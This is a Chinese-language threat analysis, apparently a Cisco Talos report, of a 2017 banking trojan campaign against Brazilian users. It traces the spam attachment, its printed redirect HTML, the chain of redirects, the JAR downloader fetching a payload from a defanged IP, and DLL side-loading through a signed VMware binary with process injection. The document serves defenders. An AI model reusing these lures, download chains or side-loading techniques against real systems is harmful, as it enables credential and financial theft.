银行木马试图窃取巴西用户资金-Cisco.PDFVIP

2017 年9 月28 日，星期四 银行木马试图窃取巴西用户资金 作者：Warren Mercer 、Paul Rascagneres 和Vanja Svajcer 引言 银行木马是困扰日常用户的最大威胁之一，因为它们会给用户造成直接的经济损失。Talos 最近观察到一项针对南美洲（主要是巴西）的新攻击活动。这一波攻击活动主要针对南美州 各大银行，试图通过窃取用户凭证来使黑客获得非法经济利益。据Talos 分析，该攻击活动 主要针对巴西用户，并且还试图通过使用多个重定向方法感染受害者计算机，并保持潜伏。 它还使用了多种反分析技术，并且最终负载是用 Delphi 编写的，这在银行木马中还相当少见。 感染媒介 垃圾邮件示例 与许多银行木马攻击活动一样，这一攻击活动也是从传播恶意垃圾邮件开始。以下是在这个 攻击活动中使用的邮件示例。攻击者使用葡萄牙语编写的邮件，这让用户感觉它更像是合法 邮件，让用户接收当地语言的邮件会使攻击者更可能实现目标，让受害者更有可能打开恶意 附件。 该邮件包含名为BOLETO_2248_.html 的HTML 附件，BOLETO 指的是在巴西境内使用的 一种发票。该HTML 文档包含前往第一个网站的简单重定向： html head title2Via Boleto/title /head body /body /html meta http-equiv=refresh content=0; url=http://priestsforscotland[.]org[.]uk/wp-content/themes/blessing/0032904.php 重定向、重定向和...重定向 HTML 附件所含的URL 首先会重定向至较短的网址goo.gl ： 然后，通过该goo.gl 网址进行第二次重定向。该短网址指向hxxp://thirdculture [.]tv:80/wp/wp-content/themes/zerif-lite/97463986909837214092129.rar。 最后，该存档文件包含一个名为BOLETO_09848378974093798043.jar 的JAR 文件。如果 用户双击该JAR 文件，java 将执行恶意代码，并开始安装银行木马。 执行Java 代码 Java 代码首先会设置恶意软件的工作环境，然后从hxxp://104[.]236[.]211[.]243/1409/pz.zip 下载其他文档。恶意软件会在它创建的C:\Users\Public\Administrator\ 目录中运行，因为它 不是默认文件夹。新的存档文件包含一组新的二进制文件。 最后一步，Java 代码会重命名下载的二进制文件，并执行vm.png （之前已重命名）： 恶意软件加载 第一次执行的二进制文件是vm.png 。它来自Vmware 的一个合法二进制文件，使用 VMware 数字签名进行签名。 Vmwarebase.dll 是该二进制文件依赖项之一： Python 2.7.12 (default, Nov 19 2016, 06:48:10) [GCC 5.4.0 on linux2 Type help, copyright, credits or license for more information. import pefile pe = pefile.PE(vm.png) for entry in pe.DIRECTORY_ENTRY_IMPORT: ... print entry.dll ... MSVCR90.dll ADVAPI32.dll vmwarebase.DLL KERNEL32.dll Vmwarebase.dll 不是合法的二进制文件，而是一个恶意的二进制文件。PlugX 等其他恶意程 序已经使用过这种方法。它背后的想法是，一些安全产品具有以下信任链：若第一个二进制 文件受信任（本文中列举的例子是vm.png ），则加载的库也将自动受信任。这种加载方法可 以绕过某些安全检查。 Vmwarebase.dll 代码的目的是将 prs.png 代码注入explorer.exe 或notepad.exe 程序并执行， 具体取决于使用者账号环境。注入是通过在远程进程中分配内存和使用LoadLibrary() 加载 gbs.png 库来执行的。通过加密(AES) 混淆API 的使用： 解密之后，m5ba+5jOiltH7Mff7neiMumHl2s= 就变成了LoadLibrary